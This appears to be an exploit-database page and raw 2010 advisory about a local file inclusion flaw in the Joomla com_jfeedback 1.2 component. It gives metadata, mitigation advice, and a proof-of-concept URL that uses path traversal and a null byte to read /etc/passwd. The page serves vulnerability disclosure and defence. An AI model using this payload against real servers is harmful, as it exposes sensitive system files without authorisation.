Joomla Component Jfeedback! Local File Inclusion Vulnerability

vendor:

Joomla

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Joomla

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:joomla:joomla:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Jfeedback! Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in the com_jfeedback version 1.2 component of Joomla. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious file path which is then included in the vulnerable application. This can allow an attacker to gain access to sensitive information stored on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any application logic. Additionally, it is recommended to keep the application and its components up to date with the latest security patches.

Source

Exploit-DB raw data:

===============================================================================================================


  [o] Joomla Component Jfeedback! Local File Inclusion Vulnerability
 
       Software : com_jfeedback version 1.2
       Vendor   : http://www.joomla.ternaria.com/
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_jfeedback&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00


===============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===============================================================================================================


  [o] April 11 2010 - GMT +07:00 Jakarta, Indonesia